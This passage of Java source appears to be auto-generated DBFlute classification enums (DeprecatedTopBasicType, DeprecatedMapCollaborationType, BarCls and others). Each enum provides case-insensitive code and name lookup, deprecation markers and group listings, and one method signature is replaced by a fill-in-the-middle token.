// Immutable per-element state; the sister set is wrapped unmodifiable at construction.
private String _code; private String _alias; private Set<String> _sisterSet;
private NamingNoCamelizingType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.NamingNoCamelizingType; }
// No groups are defined for this classification.
public boolean inGroup(String groupName) {
return false;
}
/**
 * Get the classification of the code. (CaseInsensitive)
 * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
 * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
 */
public static OptionalThing<NamingNoCamelizingType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof NamingNoCamelizingType) { return OptionalThing.of((NamingNoCamelizingType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
 * Find the classification by the name. (CaseInsensitive)
 * @param name The string of name, which is case-insensitive. (NotNull)
 * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
 */
public static OptionalThing<NamingNoCamelizingType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
 * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
 * Get the classification by the code. (CaseInsensitive)
 * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
 * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
 */
public static NamingNoCamelizingType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof NamingNoCamelizingType) { return (NamingNoCamelizingType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
 * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
 * Get the classification by the name (also called 'value' in ENUM world).
 * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
 * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
 */
public static NamingNoCamelizingType nameOf(String name) {
if (name == null) { return null; }
// valueOf() throws IllegalArgumentException on unknown names; swallowed here to keep the legacy null-returning contract.
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
 * Get the list of all classification elements. (returns new copied list)
 * @return The snapshot list of all classification elements. (NotNull)
 */
public static List<NamingNoCamelizingType> listAll() {
return new ArrayList<NamingNoCamelizingType>(Arrays.asList(values()));
}
/**
 * Get the list of classification elements in the specified group. (returns new copied list) <br>
 * @param groupName The string of group name, which is case-insensitive. (NotNull)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
 */
public static List<NamingNoCamelizingType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: NamingNoCamelizingType." + groupName);
}
/**
 * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
 * @param codeList The list of plain code, which is case-insensitive. (NotNull)
 * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
 */
public static List<NamingNoCamelizingType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<NamingNoCamelizingType> clsList = new ArrayList<NamingNoCamelizingType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
 * Get the list of classification elements in the specified group. (returns new copied list) <br>
 * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
 */
public static List<NamingNoCamelizingType> groupOf(String groupName) {
// No groups are defined, so any group name yields an empty list.
return new ArrayList<NamingNoCamelizingType>(4);
}
@Override public String toString() { return code(); }
}
/**
 * is deprecated classification
 */
@Deprecated
public enum DeprecatedTopBasicType implements CDef {
// NOTE(review): appears to be auto-generated DBFlute classification (CDef) code -- confirm before hand-editing; regeneration would overwrite manual changes.
// The whole classification is marked @Deprecated at the type level (see annotation above).
/** FooName */
FooName("FOO", "FooName", emptyStrings())
,
/** BarName */
BarName("BAR", "BarName", emptyStrings())
,
/** QuxName */
QuxName("QUX", "QuxName", emptyStrings())
;
// Lookup tables built once at class initialization: lowercased code (and sister codes) -> element, and lowercased enum name -> element, enabling case-insensitive search.
private static final Map<String, DeprecatedTopBasicType> _codeClsMap = new HashMap<String, DeprecatedTopBasicType>();
private static final Map<String, DeprecatedTopBasicType> _nameClsMap = new HashMap<String, DeprecatedTopBasicType>();
static {
for (DeprecatedTopBasicType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
// Immutable per-element state; the sister set is wrapped unmodifiable at construction.
private String _code; private String _alias; private Set<String> _sisterSet;
private DeprecatedTopBasicType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.DeprecatedTopBasicType; }
// No groups are defined for this classification.
public boolean inGroup(String groupName) {
return false;
}
/**
 * Get the classification of the code. (CaseInsensitive)
 * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
 * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
 */
public static OptionalThing<DeprecatedTopBasicType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof DeprecatedTopBasicType) { return OptionalThing.of((DeprecatedTopBasicType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
 * Find the classification by the name. (CaseInsensitive)
 * @param name The string of name, which is case-insensitive. (NotNull)
 * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
 */
public static OptionalThing<DeprecatedTopBasicType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
 * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
 * Get the classification by the code. (CaseInsensitive)
 * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
 * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
 */
public static DeprecatedTopBasicType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof DeprecatedTopBasicType) { return (DeprecatedTopBasicType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
 * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
 * Get the classification by the name (also called 'value' in ENUM world).
 * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
 * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
 */
public static DeprecatedTopBasicType nameOf(String name) {
if (name == null) { return null; }
// valueOf() throws IllegalArgumentException on unknown names; swallowed here to keep the legacy null-returning contract.
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
 * Get the list of all classification elements. (returns new copied list)
 * @return The snapshot list of all classification elements. (NotNull)
 */
public static List<DeprecatedTopBasicType> listAll() {
return new ArrayList<DeprecatedTopBasicType>(Arrays.asList(values()));
}
/**
 * Get the list of classification elements in the specified group. (returns new copied list) <br>
 * @param groupName The string of group name, which is case-insensitive. (NotNull)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
 */
public static List<DeprecatedTopBasicType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: DeprecatedTopBasicType." + groupName);
}
/**
 * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
 * @param codeList The list of plain code, which is case-insensitive. (NotNull)
 * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
 */
public static List<DeprecatedTopBasicType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<DeprecatedTopBasicType> clsList = new ArrayList<DeprecatedTopBasicType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
 * Get the list of classification elements in the specified group. (returns new copied list) <br>
 * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
 */
public static List<DeprecatedTopBasicType> groupOf(String groupName) {
// No groups are defined, so any group name yields an empty list.
return new ArrayList<DeprecatedTopBasicType>(4);
}
@Override public String toString() { return code(); }
}
/**
 * has deprecated element
 */
public enum DeprecatedMapBasicType implements CDef {
// NOTE(review): appears to be auto-generated DBFlute classification (CDef) code -- confirm before hand-editing; regeneration would overwrite manual changes.
/** FooName */
FooName("FOO", "FooName", emptyStrings())
,
/** BarName: (deprecated: test of deprecated) */
@Deprecated
BarName("BAR", "BarName", emptyStrings())
,
/** QuxName */
QuxName("QUX", "QuxName", emptyStrings())
;
// Lookup tables built once at class initialization: lowercased code (and sister codes) -> element, and lowercased enum name -> element, enabling case-insensitive search.
private static final Map<String, DeprecatedMapBasicType> _codeClsMap = new HashMap<String, DeprecatedMapBasicType>();
private static final Map<String, DeprecatedMapBasicType> _nameClsMap = new HashMap<String, DeprecatedMapBasicType>();
static {
for (DeprecatedMapBasicType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
// Immutable per-element state; the sister set is wrapped unmodifiable at construction.
private String _code; private String _alias; private Set<String> _sisterSet;
private DeprecatedMapBasicType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.DeprecatedMapBasicType; }
// No groups are defined for this classification.
public boolean inGroup(String groupName) {
return false;
}
/**
 * Get the classification of the code. (CaseInsensitive)
 * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
 * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
 */
public static OptionalThing<DeprecatedMapBasicType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof DeprecatedMapBasicType) { return OptionalThing.of((DeprecatedMapBasicType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
 * Find the classification by the name. (CaseInsensitive)
 * @param name The string of name, which is case-insensitive. (NotNull)
 * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
 */
public static OptionalThing<DeprecatedMapBasicType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
 * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
 * Get the classification by the code. (CaseInsensitive)
 * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
 * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
 */
public static DeprecatedMapBasicType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof DeprecatedMapBasicType) { return (DeprecatedMapBasicType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
 * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
 * Get the classification by the name (also called 'value' in ENUM world).
 * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
 * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
 */
public static DeprecatedMapBasicType nameOf(String name) {
if (name == null) { return null; }
// valueOf() throws IllegalArgumentException on unknown names; swallowed here to keep the legacy null-returning contract.
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
 * Get the list of all classification elements. (returns new copied list)
 * @return The snapshot list of all classification elements. (NotNull)
 */
public static List<DeprecatedMapBasicType> listAll() {
return new ArrayList<DeprecatedMapBasicType>(Arrays.asList(values()));
}
/**
 * Get the list of classification elements in the specified group. (returns new copied list) <br>
 * @param groupName The string of group name, which is case-insensitive. (NotNull)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
 */
public static List<DeprecatedMapBasicType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: DeprecatedMapBasicType." + groupName);
}
/**
 * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
 * @param codeList The list of plain code, which is case-insensitive. (NotNull)
 * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
 */
public static List<DeprecatedMapBasicType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<DeprecatedMapBasicType> clsList = new ArrayList<DeprecatedMapBasicType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
 * Get the list of classification elements in the specified group. (returns new copied list) <br>
 * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
 */
public static List<DeprecatedMapBasicType> groupOf(String groupName) {
// No groups are defined, so any group name yields an empty list.
return new ArrayList<DeprecatedMapBasicType>(4);
}
@Override public String toString() { return code(); }
}
    /**
     * has deprecated element <br>
     * (NOTE(review): looks like DBFlute auto-generated CDef code — prefer regenerating over hand-editing; confirm)
     */
    public enum DeprecatedMapCollaborationType implements CDef {
        /** FooName */
        FooName("FOO", "FooName", emptyStrings())
        ,
        /** BarBar: here (deprecated: test of deprecated) */
        @Deprecated
        BarName("BAR", "BarBar", emptyStrings())
        ,
        /** QuxQux: (deprecated: no original comment) */
        @Deprecated
        QuxName("QUX", "QuxQux", emptyStrings())
        ;
        private static final Map<String, DeprecatedMapCollaborationType> _codeClsMap = new HashMap<String, DeprecatedMapCollaborationType>();
        private static final Map<String, DeprecatedMapCollaborationType> _nameClsMap = new HashMap<String, DeprecatedMapCollaborationType>();
        // register each element's code, sister codes, and name lower-cased so of()/codeOf()/byName() resolve any casing
        static {
            for (DeprecatedMapCollaborationType value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        private String _code; private String _alias; private Set<String> _sisterSet;
        private DeprecatedMapCollaborationType(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.DeprecatedMapCollaborationType; }
        /**
         * Is the classification in the group? <br>
         * contains deprecated element here <br>
         * The group elements:[FooName, BarName]
         * @return The determination, true or false.
         */
        public boolean isContainsDeprecated() {
            return FooName.equals(this) || BarName.equals(this);
        }
        public boolean inGroup(String groupName) {
            if ("containsDeprecated".equals(groupName)) { return isContainsDeprecated(); }
            return false;
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<DeprecatedMapCollaborationType> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof DeprecatedMapCollaborationType) { return OptionalThing.of((DeprecatedMapCollaborationType)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<DeprecatedMapCollaborationType> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static DeprecatedMapCollaborationType codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof DeprecatedMapCollaborationType) { return (DeprecatedMapCollaborationType)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static DeprecatedMapCollaborationType nameOf(String name) {
            if (name == null) { return null; }
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<DeprecatedMapCollaborationType> listAll() {
            return new ArrayList<DeprecatedMapCollaborationType>(Arrays.asList(values()));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
         */
        public static List<DeprecatedMapCollaborationType> listByGroup(String groupName) {
            if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
            if ("containsDeprecated".equalsIgnoreCase(groupName)) { return listOfContainsDeprecated(); }
            throw new ClassificationNotFoundException("Unknown classification group: DeprecatedMapCollaborationType." + groupName);
        }
        /**
         * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
         * @param codeList The list of plain code, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
         */
        public static List<DeprecatedMapCollaborationType> listOf(Collection<String> codeList) {
            if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
            List<DeprecatedMapCollaborationType> clsList = new ArrayList<DeprecatedMapCollaborationType>(codeList.size());
            for (String code : codeList) { clsList.add(of(code).get()); }
            return clsList;
        }
        /**
         * Get the list of group classification elements. (returns new copied list) <br>
         * contains deprecated element here <br>
         * The group elements:[FooName, BarName]
         * @return The snapshot list of classification elements in the group. (NotNull)
         */
        public static List<DeprecatedMapCollaborationType> listOfContainsDeprecated() {
            return new ArrayList<DeprecatedMapCollaborationType>(Arrays.asList(FooName, BarName));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
         */
        public static List<DeprecatedMapCollaborationType> groupOf(String groupName) {
            if ("containsDeprecated".equals(groupName)) { return listOfContainsDeprecated(); }
            return new ArrayList<DeprecatedMapCollaborationType>(4);
        }
        @Override public String toString() { return code(); }
    }
/**
* unique key as classification
*/
public enum UQClassificationType implements CDef {
;
private static final Map<String, UQClassificationType> _codeClsMap = new HashMap<String, UQClassificationType>();
private static final Map<String, UQClassificationType> _nameClsMap = new HashMap<String, UQClassificationType>();
static {
for (UQClassificationType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private UQClassificationType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.UQClassificationType; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<UQClassificationType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof UQClassificationType) { return OptionalThing.of((UQClassificationType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<UQClassificationType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static UQClassificationType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof UQClassificationType) { return (UQClassificationType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static UQClassificationType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<UQClassificationType> listAll() {
return new ArrayList<UQClassificationType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<UQClassificationType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: UQClassificationType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
<|fim▁hole|> if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<UQClassificationType> clsList = new ArrayList<UQClassificationType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<UQClassificationType> groupOf(String groupName) {
return new ArrayList<UQClassificationType>(4);
}
@Override public String toString() { return code(); }
}
    /**
     * Classification of Bar <br>
     * (NOTE(review): looks like DBFlute auto-generated CDef code — prefer regenerating over hand-editing; confirm)
     */
    public enum BarCls implements CDef {
        /** BarOne: BarOne */
        BarOne("B01", "BarOne", emptyStrings())
        ,
        /** BarTwo: BarTwo */
        BarTwo("B02", "BarTwo", emptyStrings())
        ,
        /** BarThree: BarThree */
        BarThree("B03", "BarThree", emptyStrings())
        ,
        /** BarFour: BarFour */
        BarFour("B04", "BarFour", emptyStrings())
        ,
        /** BarFive: BarFive */
        BarFive("B05", "BarFive", emptyStrings())
        ;
        private static final Map<String, BarCls> _codeClsMap = new HashMap<String, BarCls>();
        private static final Map<String, BarCls> _nameClsMap = new HashMap<String, BarCls>();
        // register each element's code, sister codes, and name lower-cased so of()/codeOf()/byName() resolve any casing
        static {
            for (BarCls value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        private String _code; private String _alias; private Set<String> _sisterSet;
        private BarCls(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.BarCls; }
        public boolean inGroup(String groupName) {
            return false;
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<BarCls> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof BarCls) { return OptionalThing.of((BarCls)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<BarCls> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static BarCls codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof BarCls) { return (BarCls)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static BarCls nameOf(String name) {
            if (name == null) { return null; }
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<BarCls> listAll() {
            return new ArrayList<BarCls>(Arrays.asList(values()));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
         */
        public static List<BarCls> listByGroup(String groupName) {
            if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
            throw new ClassificationNotFoundException("Unknown classification group: BarCls." + groupName);
        }
        /**
         * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
         * @param codeList The list of plain code, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
         */
        public static List<BarCls> listOf(Collection<String> codeList) {
            if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
            List<BarCls> clsList = new ArrayList<BarCls>(codeList.size());
